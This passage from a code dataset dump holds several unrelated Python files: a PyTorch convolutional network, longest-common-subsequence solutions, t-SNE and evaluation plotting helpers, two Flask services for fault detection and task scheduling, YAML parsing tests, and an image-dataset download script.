\"\"\"\n\n super().__init__()\n\n # The dimension of the input vector.\n self.input_shape = input_shape\n # Number of feature maps.\n self.feature_maps = feature_maps\n # Corresponding kernel sizes.\n self.kernel_sizes = kernel_sizes\n # Number of neurons on the bottom dense layer.\n self.dense_neurons = dense_neurons\n\n activations = {\"leaky_relu\": F.leaky_relu,\n \"linear\": nn.Identity(),\n \"relu\": F.relu,\n \"sigmoid\": torch.sigmoid,\n \"tanh\": torch.tanh}\n\n # Convolution activation function.\n if not convolution_activation in activations:\n raise Exception(\"Unknown activation function '{}'.\".format(convolution_activation))\n self.convolution_activation = activations[convolution_activation]\n\n # Define the convolutional layers and maxpool layers. 
Compute\n # simultaneously the number of inputs for the final dense layer by\n # feeding an input vector through the network.\n self.conv_layers = nn.ModuleList()\n self.maxpool_layers = nn.ModuleList()\n x = torch.zeros(1, 1, self.input_shape)\n C = nn.Conv1d(in_channels=1,\n out_channels=feature_maps[0],\n kernel_size=kernel_sizes[0][0],\n padding=kernel_sizes[0][0]-1\n )\n M = nn.MaxPool1d(kernel_size=kernel_sizes[0][1],\n padding=kernel_sizes[0][1]-1\n )\n x = M(C(x))\n self.conv_layers.append(C)\n self.maxpool_layers.append(M)\n for i, K in enumerate(feature_maps[1:]):\n C = nn.Conv1d(in_channels=feature_maps[i],\n out_channels=K,\n kernel_size=kernel_sizes[i+1][0],\n padding=kernel_sizes[i+1][0]-1\n )\n torch.nn.init.kaiming_uniform_(C.weight)\n M = nn.MaxPool1d(kernel_size=kernel_sizes[i+1][1],\n padding=kernel_sizes[i+1][1]-1\n )\n x = M(C(x))\n self.conv_layers.append(C)\n self.maxpool_layers.append(M)\n\n # Define the final dense layer.\n self.flatten = nn.Flatten()\n I = x.reshape(-1).size()[0]\n self.dense_layer = nn.Linear(I, self.dense_neurons)\n torch.nn.init.xavier_uniform_(self.dense_layer.weight)\n self.bottom = nn.Linear(self.dense_neurons, 1)\n\n def forward(self, x):\n \"\"\":meta private:\"\"\"\n # Reshape to 1 channel.\n x = x.view(x.size()[0], 1, x.size()[1])\n for n in range(len(self.conv_layers)):\n C = self.conv_layers[n].to(x.device)\n M = self.maxpool_layers[n].to(x.device)\n x = self.convolution_activation(C(x))\n x = M(x)\n\n x = self.flatten(x)\n x = self.dense_layer(x)\n x = torch.sigmoid(self.bottom(x))\n\n return x\n","repo_name":"mshaheryarmalik/stgem","sub_path":"stgem/algorithm/wogan/mlm.py","file_name":"mlm.py","file_ext":"py","file_size_in_byte":9845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74885282692","text":"# problem statement: We have given 2 strings, we need to find out the longest common subsequence\n\ns1 = \"abcdghee\"\ns2 = \"abdfhrxzye\"\n\nLCS = \"abdhe\"\n\n\n# s1 = \"abcdghee\"\n# s2 = \"abdfhrxzyeqe\"\n# LCS = \"abdhee\"\n\n\n# Approach ->\n# we will always compare last elements of both the strings\n# now it might be possible that last elements can be equal or not equal\n\n# if last element is equal then we add 1 in answer and call LCS function again by dropping last elements of both\n# the strings\n# so the statement will be -> 1 + LCS(s1, s2, n-1, m-1), n = len(s1) and m = len(s2)\n\n# if last elements are not equal, then here we will have 2 choices\n# 1> take full chars of s1 and drop last element of s2\n# 2> take full chars of s2 and drop last element of s1\n# now from both 1> and 2> get the max out of it from the choices\n\n\n# recursive approach\ndef LCS(s1, s2, n, m):\n \"\"\"\n s1: string 1\n s2: string 2\n n: len(s1)\n m: len(s2)\n \"\"\"\n # base condition (Think of the smallest valid input)\n if n == 0 or m == 0:\n # if any of the string is empty then nothing will be common, so return 0\n return 0\n\n if s1[n - 1] == s2[m - 1]:\n return 1 + LCS(s1, s2, n - 1, m - 1)\n else:\n return max(LCS(s1, s2, n, m - 1), LCS(s1, s2, n - 1, m))\n\n\n# memoized_map = {}\n#\n#\n# # Memoized approach\n# def memoized_LCS(s1, s2, n, m):\n# \"\"\"\n# s1: string 1\n# s2: string 2\n# n: len(s1)\n# m: len(s2)\n# \"\"\"\n# # base condition (Think of the smallest valid input)\n# if n == 0 or m == 0:\n# # if any of the string is empty then nothing will be common, so return 0\n# return 0\n#\n# if (n, m) in memoized_map:\n# print('here...')\n# return memoized_map[(n, m)]\n# # 
print(memoized_map)\n# if s1[n - 1] == s2[m - 1]:\n# memoized_map[(n, m)] = 1 + memoized_LCS(s1, s2, n - 1, m - 1)\n# return memoized_map[(n, m)]\n# else:\n# memoized_map[(n, m)] = max(memoized_LCS(s1, s2, n, m - 1), memoized_LCS(s1, s2, n - 1, m))\n# return memoized_map[(n, m)]\n\n\n# Memoized approach\ndef memoized_LCS():\n \"\"\"\n s1: string 1\n s2: string 2\n n: len(s1)\n m: len(s2)\n \"\"\"\n memoized_map = {}\n\n def LCS_cal(s1, s2, n, m):\n\n # base condition (Think of the smallest valid input)\n if n == 0 or m == 0:\n # if any of the string is empty then nothing will be common, so return 0\n return 0\n\n if (n, m) in memoized_map:\n # print('here...')\n return memoized_map[(n, m)]\n # print(memoized_map)\n if s1[n - 1] == s2[m - 1]:\n memoized_map[(n, m)] = 1 + LCS_cal(s1, s2, n - 1, m - 1)\n return memoized_map[(n, m)]\n else:\n memoized_map[(n, m)] = max(LCS_cal(s1, s2, n, m - 1), LCS_cal(s1, s2, n - 1, m))\n return memoized_map[(n, m)]\n\n return LCS_cal\n\n\ndef top_down_LCS(s1, s2, n, m):\n # matrix of (n + 1) * (m + 1)\n t = [[None for i in range(m + 1)] for j in range(n + 1)]\n for i in range(n + 1):\n for j in range(m + 1):\n if i == 0 or j == 0:\n t[i][j] = 0\n\n for i in range(1, n + 1):\n for j in range(1, m + 1):\n if s1[i - 1] == s2[j - 1]:\n t[i][j] = 1 + t[i - 1][j - 1]\n else:\n t[i][j] = max(t[i][j - 1], t[i - 1][j])\n\n print(t)\n return t[i][j]\n\n\ns1 = \"aacabdkacaa\"\ns2 = s1[::-1]\n\nprint(LCS(s1, s2, len(s1), len(s2)))\n# print(memoized_LCS(s1, s2, len(s1), len(s2)))\nmemoized_fun = memoized_LCS()\nprint(memoized_fun(s1, s2, len(s1), len(s2)))\n\nprint(top_down_LCS(s1, s2, len(s1), len(s2)))\n","repo_name":"H1m2n/data-structures","sub_path":"dynamic_programming/longest_common_subsequences_variations/standrd_problem.py","file_name":"standrd_problem.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20630350873","text":"import abc\n\nclass PeopleFilterInterface(metaclass=abc.ABCMeta):\n @classmethod\n def __subclasshook__(cls, subclass):\n return (hasattr(subclass, 'detect_people') and \n callable(subclass.detect_people\n ) or \n NotImplemented)\n \n @abc.abstractmethod\n def detect_people(self, image)->list:\n raise NotImplementedError","repo_name":"nicoale777/IdentificacionDeOrdenes","sub_path":"services/people/PeopleFilterInterface.py","file_name":"PeopleFilterInterface.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24096313564","text":"\nimport matplotlib.pyplot as plt\n\nfrom ktsne import Ktsne\nfrom sklearn import datasets\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.utils import shuffle\n\n\n# iris = datasets.load_iris()\n# X = iris.data\n# y = iris.target\n\ndigits = datasets.load_digits()\nX = digits.data\ny = digits.target\n\n\nX, y = shuffle(X, y)\nX = X[:500]\ny = y[:500]\n\nscaler = MinMaxScaler(feature_range=(-1, 1))\n\nf_opts = {'p_degree': 2.0, 'p_dims': 12, 'eta': 25.0,\n 'perplexity': 50.0, 'n_dims': 2, 'ker': 'pca', 'gamma': 1.0}\n\nkernel = f_opts[\"ker\"]\n\nplt.clf()\n\n\nX1 = scaler.fit_transform(X)\n\nplt.subplot(2, 1, 1)\n# Plot the training points\nX_pca = PCA(n_components=2).fit_transform(X1)\nx_min, x_max = X_pca[:, 0].min() - .5, X_pca[:, 0].max() + .5\ny_min, y_max = X_pca[:, 1].min() - .5, X_pca[:, 1].max() + .5\n\nplt.scatter(X_pca[:, 0], X_pca[:, 1], c=y, 
cmap=plt.cm.Set1,\n edgecolor='k')\nplt.xlabel('p1')\nplt.ylabel('p2')\nplt.xlim(x_min, x_max)\nplt.ylim(y_min, y_max)\nplt.xticks(())\nplt.yticks(())\nplt.title(\" PCA without ktsne \")\n\n\nk_tsne = Ktsne(X1, f_opts=f_opts)\nX_reduced = k_tsne.get_solution(3000)\nX_reduced = scaler.fit_transform(X_reduced)\nplt.subplot(2, 1, 2)\n\nplt.scatter(X_reduced[:, 0], X_reduced[:, 1], c=y, cmap=plt.cm.Set1,\n edgecolor='k')\nx1_min, x1_max = X_reduced[:, 0].min() - .5, X_reduced[:, 0].max() + .5\ny1_min, y1_max = X_reduced[:, 1].min() - .5, X_reduced[:, 1].max() + .5\n\nplt.xlabel(' V1 ')\nplt.ylabel(' V2 ')\n\nplt.xlim(x1_min, x1_max)\nplt.ylim(y1_min, y1_max)\nplt.xticks(())\nplt.yticks(())\nplt.title(\"with ktsne %s kernel \" % kernel)\n\n\nplt.subplots_adjust(hspace=0.5)\nplt.show()\n","repo_name":"DanShai/kernalized-tsne","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"69879498372","text":"# import numpy as np\nfrom sklearn import metrics\nfrom sklearn.metrics import precision_recall_curve, average_precision_score\n\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\n\n\ndef evaluation(all_pred, all_labels, epoch):\n fpr, tpr, thresholds = metrics.roc_curve(np.array(all_labels), np.array(all_pred), pos_label=1)\n # np.savez('auc.npz', fpr=fpr, tpr=tpr, thresholds=thresholds)\n roc_auc = metrics.auc(fpr, tpr)\n return fpr, tpr, roc_auc\n\n\ndef plot_auc_curve(fpr, tpr, roc_auc, epoch):\n curve_dir = 'charts/auc/'\n if not os.path.exists(curve_dir):\n os.makedirs(curve_dir)\n auc_curve_file = os.path.join(curve_dir, 'auc_%02d.png' % (epoch))\n\n plt.title(f'Receiver Operating Characteristic at epoch: {epoch}')\n plt.plot(fpr, tpr, 'b', label='AUC = %0.2f' % roc_auc)\n plt.legend(loc='lower right')\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.savefig(auc_curve_file)\n plt.close()\n\n\ndef plot_pr_curve(all_labels, all_pred, epoch):\n pr_dir = 'charts/pr/'\n if not os.path.exists(pr_dir):\n os.makedirs(pr_dir)\n pr_curve_file = os.path.join(pr_dir, 'pr_%02d.png' % (epoch))\n precision, recall, thresholds = precision_recall_curve(np.array(all_labels), np.array(all_pred))\n # np.savez('ap_attention_bbox_flow.npz', precision=precision,\n # recall=recall, thresholds=thresholds)\n ap = average_precision_score(np.array(all_labels), np.array(all_pred))\n\n plt.title(f'Precision-Recall Curve at epoch: {epoch}')\n plt.plot(recall, precision, 'b', label='AP = %0.2f' % ap)\n plt.legend(loc='lower right')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('Precision')\n plt.xlabel('Recall')\n plt.savefig(pr_curve_file)\n plt.close()\n return ap\n\n\ndef frame_auc(output, labels):\n # print(output)\n output = np.array(output)\n labels = np.array(labels)\n # print(output)\n all_pred = []\n all_labels = []\n\n for t in range(len(output)):\n frame = output[t]\n frame_score = []\n frame_label = []\n print(frame)\n\n if len(frame) == 0:\n continue\n else:\n for j in range(len(frame)):\n score = np.exp(frame[j][:, 1])/np.sum(np.exp(frame[j]), axis=1)\n frame_score.append(score)\n frame_label.append(labels[t][j]+0)\n all_pred.append(max(frame_score))\n all_labels.append(sum(frame_label))\n\n new_labels = []\n for i in all_labels:\n if i > 0.0:\n new_labels.append(1.0)\n else:\n new_labels.append(0.0)\n\n fpr, tpr, thresholds = 
metrics.roc_curve(np.array(new_labels), np.array(all_pred), pos_label=1)\n roc_auc = metrics.auc(fpr, tpr)\n\n return roc_auc\n\n\n# def evaluation(all_pred,all_labels):\n# # cm = confusion_matrix(all_labels, all_pred, labels=['no-risk','risk'])\n# TPs = 0\n# TNs = 0\n# FPs = 0\n# FNs = 0\n# for pred,gt in zip(all_pred,all_labels):\n# if gt ==0:\n# if pred ==0:\n# TNs+=1\n# elif pred==1:\n# FPs+=1\n# elif gt ==1:\n# if pred==0:\n# FNs+=1\n# elif pred ==1:\n# TPs+=1\n#\n# cm = ([TNs,FPs],[FNs,TPs])\n# if TPs == 0:\n# recall =0\n# precision = 0\n# accuracy = (TPs+TNs)/(TPs+TNs+FPs+FNs)\n# else:\n# recall = TPs/(TPs+FNs)\n# precision = TPs/(TPs+FPs)\n# accuracy = (TPs+TNs)/(TPs+TNs+FPs+FNs)\n# return cm, precision, recall, accuracy\n","repo_name":"monjurulkarim/risky_object","sub_path":"models/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"17716593812","text":"from flask import Flask, render_template, Response\nfrom flask import request\nimport json\nimport plotly\nfrom flask_cors import CORS\nfrom getopt import getopt, GetoptError\nfrom logging.handlers import RotatingFileHandler\nfrom flask.logging import default_handler\nimport os\nimport sys\nimport logging\nfrom data_processing import preprocessing, system_fault, fault_database\n\napp = Flask(__name__)\nCORS(app)\n\n# --------------------------------\n# Configuration\n# --------------------------------\n\nconfig_file = None\ntry:\n opts, args = getopt(sys.argv[1:], \"c:\", [\"config=\"])\n for opt, arg in opts:\n if opt in '-c, --config':\n config_file = arg\nexcept GetoptError:\n pass\nif not config_file:\n config_file = os.path.abspath(\n os.path.dirname(__file__) + os.sep + 'config' + os.sep + 'config.json')\n print('Assuming config file at: ' + config_file)\nif not os.path.exists(config_file):\n print('config file: ' + config_file + ' not found')\n exit(-1)\napp.config.from_json(config_file)\n\n# --------------------------------\n# Logger Settings\n# --------------------------------\n\nroot = logging.getLogger()\nroot.addHandler(default_handler)\n\nos.makedirs(app.config['LOG_DIR'], exist_ok=True)\nrotating_handler = RotatingFileHandler(app.config['LOG_DIR'] + os.sep + 'fault_detection.log',\n maxBytes=app.config['LOG_MAX_SIZE'],\n backupCount=app.config['LOG_MAX_FILES'])\nformatter = logging.Formatter('[%(asctime)s] %(levelname)s : %(message)s')\nrotating_handler.setFormatter(formatter)\nroot.addHandler(rotating_handler)\n\nif app.config['DEBUG']:\n root.setLevel(logging.DEBUG)\nelse:\n root.setLevel(logging.INFO)\n\nroot.info('Service faults_detection started')\nroot.info('Service faults_detection configuration file: ' + config_file)\nroot.info('Service faults_detection logs of reports: ' + app.config['LOG_DIR'])\n\n\n# --------------------------------\n# routes\n# --------------------------------\n\n@app.route('/get_sql_ids')\ndef get_sql_id_list():\n path = app.config['SQL_ID_DATA_DIR']\n sql_id_list = []\n try:\n file_sql_id = open(path)\n except FileNotFoundError as e:\n root.error(e, exc_info=True)\n return Response(\"file not found\", status=500, mimetype='text/xml')\n\n for line in file_sql_id:\n sql_id_list.append(line)\n\n graph_json = json.dumps(sql_id_list)\n return Response(graph_json, status=200, mimetype='application/json')\n\n\n@app.route('/plot', methods=['GET'])\ndef plot_sys_fault():\n root.debug(\" ========== plot started ========\")\n sql_id = 
request.args.get('sql_id', None)\n days_num = request.args.get('days_num', None)\n path_log = app.config['LOG_DATA_DIR']\n path_fault = app.config['FAULT_DATA_DIR']\n # check if we have enough data\n\n try:\n sql_stores_dict = preprocessing.get_preprocessed_data(days=int(days_num), path_file=path_log)\n except FileNotFoundError as e:\n root.error(e, exc_info=True)\n return Response(\"file not found\", status=500, mimetype='text/xml')\n\n if len(sql_stores_dict) == 0 or int(sql_id) not in sql_stores_dict.keys():\n logging.warning(\"Request not completed due to unavailability of data\")\n return Response(\"Data is not available in the specified days. Please increase the days number\", status=400,\n mimetype='text/xml')\n\n fig = creat_fig(sql_stores_dict, int(sql_id), path_fault)\n graph_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n root.info(\"plotting is finished\")\n root.debug(\" ========== plot finished ========\")\n return Response(graph_json, status=200, mimetype='application/json')\n\n\n@app.route('/')\ndef home():\n return render_template('sys-fault.html')\n\n\ndef creat_fig(sql_stores_dict, sql_id, path_fault):\n # configuration\n time_interval = app.config['TIME_INTERVAL']\n acceptance_rate = app.config['ACCEPTANCE_RATE']\n min_valid_pair_intervals = app.config['MIN_VALID_PAIR_INTERVAL']\n window_size = app.config['WINDOWS_SIZE_MOVING_AVERAGE']\n sql_id_plot = sql_stores_dict.copy()\n\n is_database_valid = False\n try:\n is_database_valid = fault_database.is_valid_database(time_interval, acceptance_rate, min_valid_pair_intervals,\n path_fault)\n except OSError as e:\n root.error(e, exc_info=True)\n\n # if the current configuration is matched with the data in fault.txt, we check the last_update and try to find the\n # faults after the last updated time\n if is_database_valid:\n root.info(\"Faults text file is valid. Start reading the faults from text file.\")\n last_database_update = fault_database.get_last_update(path_fault)\n sql_stores_dict = preprocessing.limit_sql_id(sql_stores_dict, last_database_update)\n\n # if we have new data after the last updated time in database\n if len(sql_stores_dict) != 0:\n root.info(\"Database is not updated. 
Start finding faults among new added data\")\n grouped_data = system_fault.group_by_minutes(sql_stores_dict, time_interval=time_interval)\n # detect the fault time intervals in the system\n sys_fault = system_fault.calculate_fault(grouped_data, acceptance_rate=acceptance_rate,\n min_valid_pair_intervals=min_valid_pair_intervals)\n # reading all faults from file\n sys_fault = fault_database.get_saved_faults(path_fault) + sys_fault\n else:\n sys_fault = fault_database.get_saved_faults(path_fault)\n else:\n root.warning(\"Database configuration is not valid\")\n root.info(\"Start processing all the data.\")\n grouped_data = system_fault.group_by_minutes(sql_stores_dict, time_interval=time_interval)\n # detect the fault time intervals in the system\n sys_fault = system_fault.calculate_fault(grouped_data, acceptance_rate=acceptance_rate,\n min_valid_pair_intervals=min_valid_pair_intervals)\n\n # show the graph on moving average\n moved_average = preprocessing.moving_average(sql_id_plot[sql_id], window_size=window_size)\n return system_fault.plot_sys_fault(moved_average, sql_id, sys_fault, time_interval=time_interval)\n\n\n@app.route('/get_info')\ndef get_info():\n root.debug(\" ========== get info started ========\")\n sql_id = request.args.get('sql_id', None)\n path_log = app.config['LOG_DATA_DIR']\n sql_stores = preprocessing.get_info_for_sql_id(path_log, 365, sql_id)\n last_date = sql_stores['date'][0]\n number_of_requests = preprocessing.get_number_of_requests_per_month(sql_stores['date'])\n ip_address = preprocessing.get_number_of_ip(sql_stores['date'], sql_stores['ip_address'])\n object_dict = {\"last_date\": last_date.strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"ip_address\": ip_address,\n \"number_of_requests\": number_of_requests}\n graph_json = json.dumps(object_dict)\n root.debug(\" ========== get info finished ========\")\n return Response(graph_json, status=200, mimetype='application/json')\n\n\n@app.errorhandler(Exception)\ndef handle_exception(e):\n root.error(e, exc_info=True)\n return Response(\"Check the logs for more information on the error\", status=500, mimetype='text/xml')\n","repo_name":"alireza-mht/sys-fault-detection","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73299777734","text":"from flask import Blueprint, request\nfrom spooler_task import SpoolerTask\nimport traceback\n\nfrom util.service_utils import ServiceUtils\nfrom helpers.chains_helper import ChainsHelper\n\nfrom util.constants import MONGO_DB_COLLECTION_ORDERS, MONGO_DB_COLLECTION_HISTORICAL, MONGO_DB_COLLECTION_LOGS\nfrom services.chain_service import ChainService\nfrom services.process.scheduler_service import SchedulerService\n\n\nchains_routes = Blueprint('chains_routes', __name__, url_prefix='/api/chains')\nchain_service = None # Variable estática para almacenar el servicio de tareas\nscheduler_service = None # Variable estática para almacenar el servicio de scheduler\n\n\n@chains_routes.record\ndef initialize_service(state):\n \"\"\"\n El decorador @orders_routes.record es específico de Flask y se utiliza para registrar una función de configuración\n que se ejecuta cuando se registra el blueprint orders_routes.\n \"\"\"\n global chain_service, scheduler_service\n\n # Obtener la instancia de la conexión a MongoDB de la configuración de la aplicación\n mongo_db_connection = state.app.config.get('DATABASE')\n # Obtenemos el clinete de mongoDB para procesos 
transaccionales\n clientMongoDB = state.app.config.get('CLIENT')\n\n # Creo una instancia de la clase chain_service\n chain_service = ChainService(\n mongo_db_connection, MONGO_DB_COLLECTION_ORDERS, clientMongoDB)\n\n # Creo una instancia de la clase scheduler_service\n scheduler_service = SchedulerService(\n mongo_db_connection, MONGO_DB_COLLECTION_ORDERS, MONGO_DB_COLLECTION_HISTORICAL,\n MONGO_DB_COLLECTION_LOGS, clientMongoDB)\n\n\n@chains_routes.route('/', methods=['POST'])\ndef get_chains(order_id):\n try:\n chains = chain_service.get(order_id)\n\n positions = []\n for i, obj in enumerate(chains):\n obj[\"position\"] = i + 1\n positions.append(i+1)\n\n options = [item[\"name\"] for item in chains]\n options.append(\"exito\")\n options.append(\"error\")\n\n return ServiceUtils.success({\"data\": chains, \"options\": options, \"positions\": positions})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/modify', methods=['POST'])\ndef modify_chain():\n try:\n param = request.get_json()\n order_id = param['order_id']\n chains = param['chains']\n\n chain_service.modify(order_id, chains)\n\n return get_chains(order_id)\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/params', methods=['POST'])\ndef params_job():\n try:\n param = request.get_json()\n order_id = param['order_id']\n job_id = param['job_id']\n\n response = chain_service.get_params(order_id, job_id)\n\n return ServiceUtils.success(response)\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/update_params', methods=['POST'])\ndef update_params():\n try:\n param = request.get_json()\n order_id = param['order_id']\n job_id = param['job_id']\n params = param['params']\n chain_service.update_params(order_id, job_id, params)\n\n return ServiceUtils.success({\"data\": {}})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/history')\ndef history():\n try:\n response = scheduler_service.get_historical()\n # response.sort(key=lambda x: x['startDate'], reverse=True)\n return ServiceUtils.success({\"data\": response})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/process/', methods=['POST'])\ndef process(order_id):\n values = {}\n try:\n spooler = SpoolerTask(scheduler_service)\n spooler.logger.info(\"Orden a procesar \" + order_id)\n spooler.get_order(order_id)\n\n values = ChainsHelper.create_record(\n order_id, spooler.current_job, spooler.log_name)\n\n id = scheduler_service.add_historical(values)\n\n spooler.process()\n\n process_record(spooler.logger, values, \"SUCCESS\")\n\n return ServiceUtils.success({})\n except Exception as e:\n trace = traceback.format_exc()\n print(f\"Error.........................: {str(e)}\\n{trace}\")\n spooler.logger.error(\n f\"Error.........................: {str(e)}\\n{trace}\")\n\n process_record(spooler.logger, values, \"ERROR\")\n\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/log/', methods=['POST'])\ndef log_data(name):\n try:\n response = scheduler_service.get_logs(name)\n return ServiceUtils.success({\"data\": response})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\ndef process_record(logger, values, type):\n if type == \"SUCCESS\":\n values = ChainsHelper.update_record(values, \"exitoso\", \"success\")\n logger.info(\"Proceso termino exitosamente.\")\n else:\n values = ChainsHelper.update_record(values, \"fallido\", \"error\")\n logger.info(\"Proceso termino con error.\")\n 
scheduler_service.update_historical(values)\n\n handlers = logger.handlers[:]\n for handler in handlers:\n logger.removeHandler(handler)\n handler.close()\n\n\n@chains_routes.route('/delete_historical', methods=['POST'])\ndef delete_historical():\n try:\n scheduler_service.delete_all_historical()\n return ServiceUtils.success({})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/delete_logs', methods=['POST'])\ndef delete_logs():\n try:\n scheduler_service.delete_all_logs()\n return ServiceUtils.success({})\n except Exception as e:\n return ServiceUtils.error(e)\n","repo_name":"wlopera/task-scheduler-python","sub_path":"routes/chains_routes.py","file_name":"chains_routes.py","file_ext":"py","file_size_in_byte":5717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24998846227","text":"import os\nimport inspect\nimport yaml\nfrom jon.jon_wrapper import JONFactory\n\nscript_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\n\n\ndef test_simple_manifest():\n with open(script_dir + '/k8s_simple_manifest.yml', 'r') as stream:\n try:\n d = yaml.safe_load(stream)\n json_obj2 = JONFactory.wrap(d)\n\n assert json_obj2.kind == 'Deployment'\n assert json_obj2.metadata.labels.app == 'consumer'\n assert json_obj2.spec.template.spec.containers[0].image == 'emmerson/cdi-rabbit-consumer:1.1.0'\n\n except yaml.YAMLError as e:\n print(e)\n\n\ndef test_multiple_manifest():\n with open(script_dir + '/k8s_manifests.yml', 'r') as stream:\n try:\n docs = yaml.safe_load_all(stream)\n all = [JONFactory.wrap(doc) for doc in docs]\n assert len(all) == 10\n assert all[0].metadata.name == 'consumer-configmap'\n assert all[0].data.RABBIT_HOST == 'rabbitmq'\n assert all[1].metadata.name == 'producer-configmap'\n\n assert all[2].kind == 'Service'\n assert all[2].metadata.labels.app == 'rabbitmq'\n except yaml.YAMLError as e:\n print(e)\n\n","repo_name":"Emmerson-Miranda/javascript-object-notation","sub_path":"tests/test_yml_wrapper.py","file_name":"test_yml_wrapper.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"5773575023","text":"import os\nimport concurrent.futures as cf\nimport re\n\nfrom io import BytesIO\n\nimport imageio\nfrom PIL import Image\nimport urllib\nimport requests\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torchvision.transforms as transforms\n\nfrom tqdm import tqdm, trange\n\n\n# Function extracts the image from a GIF URL that is provided in the parameter\n# This is done by extracting the first frame from the image\ndef extract_img_from_gif(img_url):\n pil_img = Image.open(urllib.request.urlopen(img_url))\n pil_img.seek(0)\n rgb_img = pil_img.convert(\"RGB\")\n pil_img.close()\n \n return np.array(rgb_img)\n\n\n# Function fetches both GIFs and other image typed from the links declared.\n# After fetching, they are pre-processed accordingly with regard to image type.\ndef extract_img(img_url):\n img_np = None\n not_fetched = False\n try:\n # naively look for GIFs\n from_url = requests.get(img_url, stream=True, timeout=10)\n # img = imageio.imread(imageio.core.urlopen(img_url).read())\n img = imageio.imread(BytesIO(from_url.raw.read()))\n if (img.shape[2] == 4):\n img_np = extract_img_from_gif(img_url) # get the fist frame of GIF\n else:\n img_np = img\n except Exception as exc:\n # Image is probably now a dead link or requires authentication to access\n # 
print(exc)\n not_fetched = True\n \n if not_fetched:\n return None\n # Make sure that the image is set up in that, the width is always longer than\n # the height.\n # This means rotating the image is need be\n img_tensor = torch.from_numpy(img_np.copy())\n img_tensor = img_tensor.permute(2, 0, 1)\n if img_tensor.shape[1] > img_tensor.shape[2]:\n img_tensor = img_tensor.permute(0, 2, 1)\n \n np_img = transforms.Resize((100, 100))(img_tensor).detach().numpy()\n\n return np_img\n\n\n\ndef populate_dataset(dataset_type):\n save_location = f\"data/processed-data/{dataset_type}\"\n train_csv = pd.read_csv(f\"{save_location}/train.csv\")\n test_csv = pd.read_csv(f\"{save_location}/test.csv\")\n\n training_dataset_imgs = []\n training_dataset_out = []\n evaluation_dataset_imgs = []\n evaluation_dataset_out = []\n\n for i in tqdm(range(len(train_csv))):\n np_img = extract_img(train_csv.iloc[i][\"img_link\"])\n eig_val = np.eye(2)[train_csv.iloc[i][\"is_explicit\"]]\n \n # make sure that the images are actually fetched and no error occurred while fetching images\n if np_img is not None:\n training_dataset_imgs.append(np.array(np_img))\n training_dataset_out.append(eig_val)\n\n for i in tqdm(range(len(test_csv))):\n np_img = extract_img(test_csv.iloc[i][\"img_link\"])\n eig_val = np.eye(2)[test_csv.iloc[i][\"is_explicit\"]]\n \n # make sure that the images are actually fetched and no error occurred while fetching images\n if np_img is not None:\n evaluation_dataset_imgs.append(np_img)\n evaluation_dataset_imgs.append(eig_val)\n \n # create dataset tuples\n training_set = (training_dataset_imgs, training_dataset_out)\n evaluation_set = (evaluation_dataset_imgs, evaluation_dataset_out)\n\n save_dataset(dataset_type, training_set, evaluation_set)\n\n\ndef save_arr(location, dataset):\n \"\"\"\n Saves the dataset in the specified location\n location: specific absolute location the data will be saved\n dataset: np.array that is being saved\n \"\"\"\n with open(location, \"wb\") as target_file:\n np.save(target_file, dataset)\n\n\ndef save_dataset(dataset_type, train, test):\n save_location = f\"data/processed-data/{dataset_type}\"\n train_imgs_location = f\"{save_location}/train-imgs.npy\"\n train_out_location = f\"{save_location}/train-out.npy\"\n test_imgs_location = f\"{save_location}/test-imgs.npy\"\n test_out_location = f\"{save_location}/test-out.npy\"\n\n \n # training set\n save_arr(train_imgs_location, train[0]) # save the training images\n save_arr(train_out_location, train[1]) # save the training images\n\n # training set\n save_arr(test_imgs_location, test[0]) # save the training images\n save_arr(test_out_location, test[1]) # save the training images\n\n\ndef save_segment(upper_bound, dataset_type, segment_type, segment_dataset):\n \"\"\"\n upper_bound (int): This is the last number in the longer list of images that is extracted by this func\n dataset_type: \"50-50, 70-30, 80-20, 90-10\" based on the current type that is being downloaded\n segment_type: \"train | test\" based on the dataset type\n sample_imgs: these is a list of numoy arrays of the corresponding images of the segment\n sample_outs: thesea are the corresponding correct outputs of the images\n \"\"\"\n img_save_location = f\"data/processed-data/{dataset_type}/{segment_type}-{upper_bound}-img.npy\"\n out_save_location = f\"data/processed-data/{dataset_type}/{segment_type}-{upper_bound}-out.npy\"\n\n save_arr(img_save_location, segment_dataset[0])\n 